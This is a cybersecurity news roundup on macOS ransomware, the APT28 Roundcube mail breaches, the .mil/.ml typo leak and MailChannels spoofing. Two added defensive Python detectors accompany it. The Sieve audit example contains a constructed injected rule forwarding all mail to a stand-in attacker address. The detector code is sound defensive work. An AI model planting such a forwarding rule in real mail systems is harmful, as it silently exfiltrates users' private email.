Mac Ransomware Alert, Russian Email Espionage, UK Email Redirect – Cybersecurity News [August 7, 2023]
In this latest email security news update, we bring you up to speed with the latest email scams and related updates.
Microsoft: There are Ransomware Issues on Apple’s macOS Platform
Microsoft security researchers recently flagged ransomware problems on Apple’s macOS operating system. They warned that financially motivated hackers could abuse legitimate macOS features to evade defenses, exploit vulnerabilities, and infect devices with Search Marquis or other types of malware.
Microsoft shared a blog post containing research findings on four macOS ransomware families. The post also includes technical details and IOCs showing how financially motivated cybercriminals target macOS-powered devices.
“While the documented malware families are old, they show us the capabilities of threat actors exploiting the [Mac] platform,” Redmond noted, adding that the work could serve as a “technical reference” for researchers. Researchers can use it to deepen their understanding of macOS threats and, importantly, to improve ransomware protection measures, strengthening defenses against such attacks.
Russian Cyber Espionage Group Targets Roundcube Email Servers
A threat group that researchers are tracking as APT28 recently breached Roundcube email servers of multiple Ukrainian organizations and government entities. The APT28 threat group is linked to Russia’s GRU (General Staff Main Intelligence Directorate).
In these attacks, the APT28 cyber-espionage group (also called Fancy Bear, Sednit, BlueDelta, and Sofacy) took advantage of the ongoing Russia-Ukraine conflict and tricked recipients into opening emails that exploited Roundcube Webmail vulnerabilities to compromise unpatched servers.
After compromising the email servers, the cyber-espionage group deployed malicious scripts that redirected all incoming email for targeted individuals to an attacker-controlled email address. The attackers used these scripts for reconnaissance and to steal victims’ Roundcube session cookies, address books, and other information.
According to a joint investigation by Ukraine’s CERT-UA (Computer Emergency Response Team) and Recorded Future’s Insikt Group, the threat group wanted to steal military intelligence to support the Russian invasion of Ukraine.
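The defensive check a mail administrator would want after reading the Roundcube story is an audit of server-side forwarding rules for redirects to addresses outside the organisation. The following is an added example, not code from the article, CERT-UA, Recorded Future or Roundcube. It assumes the forwarding is expressed as Sieve `redirect` actions (the article only says "malicious scripts"; Sieve is the usual server-side filter language behind Roundcube's managesieve plugin, so this is an assumption), and the sample script and domains are constructed for the demonstration.

```python
"""Audit Sieve filter scripts for redirects that forward mail outside the organisation.

Added example with constructed input. Assumes forwarding rules are Sieve
'redirect' actions; the organisation's own domains are an assumed allow-list.
"""
import re

ORG_DOMAINS = {"example.gov.ua"}  # constructed: domains treated as internal

# Sieve redirect syntax: redirect "addr";  or  redirect :copy "addr";  (RFC 5228 / RFC 3894)
REDIRECT_RE = re.compile(r'\bredirect\b(?:\s+:copy)?\s+"([^"]+)"', re.IGNORECASE)


def strip_comments(script: str) -> str:
    """Remove Sieve bracketed (/* */) and hash (#) comments so they cannot hide a rule."""
    script = re.sub(r"/\*.*?\*/", "", script, flags=re.S)
    return re.sub(r"#[^\n]*", "", script)


def external_redirects(script: str, org_domains=ORG_DOMAINS):
    """Return [(address, unconditional)] for every redirect to a non-organisation address.

    'unconditional' is True when the redirect sits at brace depth 0, i.e. outside any
    'if' block, so it forwards every incoming message, which is the pattern described
    in the Roundcube attacks. Addresses without a domain part are treated as external.
    """
    clean = strip_comments(script)
    findings = []
    for match in REDIRECT_RE.finditer(clean):
        addr = match.group(1)
        domain = addr.rsplit("@", 1)[-1].lower() if "@" in addr else ""
        if domain in org_domains:
            continue
        before = clean[: match.start()]
        depth = before.count("{") - before.count("}")
        findings.append((addr, depth == 0))
    return findings


# Constructed sample: one legitimate filing rule plus an injected catch-all forward.
SAMPLE_SIEVE = """
require ["fileinto", "copy"];
# legitimate user rule
if header :contains "subject" "newsletter" {
    fileinto "Lists";
}
if address :is "from" "boss@example.gov.ua" {
    redirect "deputy@example.gov.ua";
}
/* injected by the attacker (constructed) */
redirect :copy "collector@attacker.example";
"""

if __name__ == "__main__":
    for addr, unconditional in external_redirects(SAMPLE_SIEVE):
        kind = "ALL MAIL" if unconditional else "conditional"
        print(f"external redirect ({kind}): {addr}")
```

Run this over every user's active Sieve script (for Dovecot, typically the `.dovecot.sieve` symlink target in each home or mail directory) and alert on any finding; an unconditional external redirect on a mailbox that never had one is a high-confidence indicator of the compromise pattern above.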
UK MoD Mistakenly Redirects Emails To Russia’s Ally Instead Of US
According to a recent finding, millions of emails intended for .mil US military addresses were sent instead, because of a one-letter typo, to .ml addresses, the top-level domain of Mali in Africa, over roughly a decade. As a result of the typo, maps of military installations, identity documents, bookings for high-ranking military leaders, travel itineraries, medical data, and other data went to the .ml addresses rather than the .mil ones.
Responding to questions about why the US military could not detect the email leaks for so long, the US Department of Defense said it was aware of the issue and took “all unauthorized disclosures of Controlled Unclassified Information or Controlled National Security Information seriously.”
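The failure mode here is a recipient domain that is one edit away from the intended one. An outbound-mail check that flags such lookalikes, before the message leaves, is the control a mail administrator would add. The code below is an added example, not part of the article or any product it mentions; the trusted domains, the protected TLD and the sample recipient list are constructed, and the allow-list of legitimate TLDs that happen to be one edit from `mil` (for instance `il`) is an assumption an operator would tune.

```python
"""Flag outbound recipients whose domain is a one-edit lookalike of a trusted domain or TLD.

Added example with constructed data. Demonstrates the .mil -> .ml typo case and the
false-positive caveat (legitimate TLDs such as .il are also one edit from 'mil').
"""

TRUSTED_DOMAINS = {"army.mil", "navy.mil"}   # constructed: domains mail is expected to go to
PROTECTED_TLDS = {"mil"}                     # constructed: TLDs whose typos must be caught
ALLOWED_LOOKALIKE_TLDS = {"il"}              # assumption: real TLDs one edit away, not typos


def levenshtein(a: str, b: str) -> int:
    """Classic edit distance (insert/delete/substitute) with a single rolling row."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def classify_recipient(addr: str, max_distance: int = 1):
    """Return ("ok", None), ("domain-lookalike", trusted_domain) or ("tld-lookalike", tld).

    Exact trusted domains and their subdomains pass. Otherwise the whole domain is
    compared against each trusted domain, then the TLD against each protected TLD.
    """
    domain = addr.rsplit("@", 1)[-1].lower()
    if domain in TRUSTED_DOMAINS or any(domain.endswith("." + t) for t in TRUSTED_DOMAINS):
        return ("ok", None)
    for trusted in TRUSTED_DOMAINS:
        if levenshtein(domain, trusted) <= max_distance:
            return ("domain-lookalike", trusted)
    tld = domain.rsplit(".", 1)[-1]
    if tld not in PROTECTED_TLDS and tld not in ALLOWED_LOOKALIKE_TLDS:
        for protected in PROTECTED_TLDS:
            if levenshtein(tld, protected) <= max_distance:
                return ("tld-lookalike", protected)
    return ("ok", None)


def flagged_recipients(recipients):
    """Return the subset of recipients that should be held for review, with the reason."""
    return [(addr, *classify_recipient(addr)) for addr in recipients
            if classify_recipient(addr)[0] != "ok"]


# Constructed outbound recipient list for the demonstration.
SAMPLE_RECIPIENTS = [
    "jdoe@army.mil",             # intended
    "jdoe@army.ml",              # one-letter typo, lands in Mali's TLD
    "ops@mail.navy.mil",         # subdomain of a trusted domain
    "liaison@contractor.ml",     # unknown domain, but TLD is a typo of 'mil'
    "counsel@lawfirm.co.il",     # legitimate Israeli domain, allow-listed TLD
    "vendor@supplier.example",   # unrelated domain, far from any trusted one
]

if __name__ == "__main__":
    for addr, verdict, ref in flagged_recipients(SAMPLE_RECIPIENTS):
        print(f"HOLD {addr}: {verdict} of {ref}")
```

Wiring this into an outbound milter or DLP rule turns a decade-long silent misdirection into a same-day quarantine event; the allow-list is what keeps it from blocking legitimate correspondence with domains that merely resemble the protected TLD.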
An Email Security Vendor Left Around 2M Domains Open To Phishing Hacks: Study
According to research shared with Axios, a security researcher, Salvati, uncovered how to spoof around 2 million email domain names to launch phishing attacks requiring little or no expertise. Salvati’s research focuses on MailChannels, an email security vendor that offers tools for businesses that send automated communications to their customers, such as email newsletters.
Typically, such a provider requires customers to prove they own a domain before allowing them to send email from it.
Unlike traditional systems, MailChannels is principally designed to serve web-hosting companies that send email on behalf of their clients, such as signup confirmations or password reset emails. Rather than relying on domain ownership checks, it uses spam filtering and other spam detection tools to gauge the reputation of users’ IP addresses and analyze their historical behavior.
It also scans parts of each message before sending it. Salvati built a tool that enabled anyone to send email from any MailChannels customer’s domain name without verifying that they owned the domain.
In one example, Salvati spoofed the domain name of the Black Hat hacking conference organized in Vegas this week.
As long as the email looked harmless, malicious actors’ emails were not flagged by the company’s default cybersecurity features. Any hacker who wanted to do this only needed $80 to sign up for a MailChannels account and gain access. The incident highlights the importance of email security in today’s evolving threat landscape.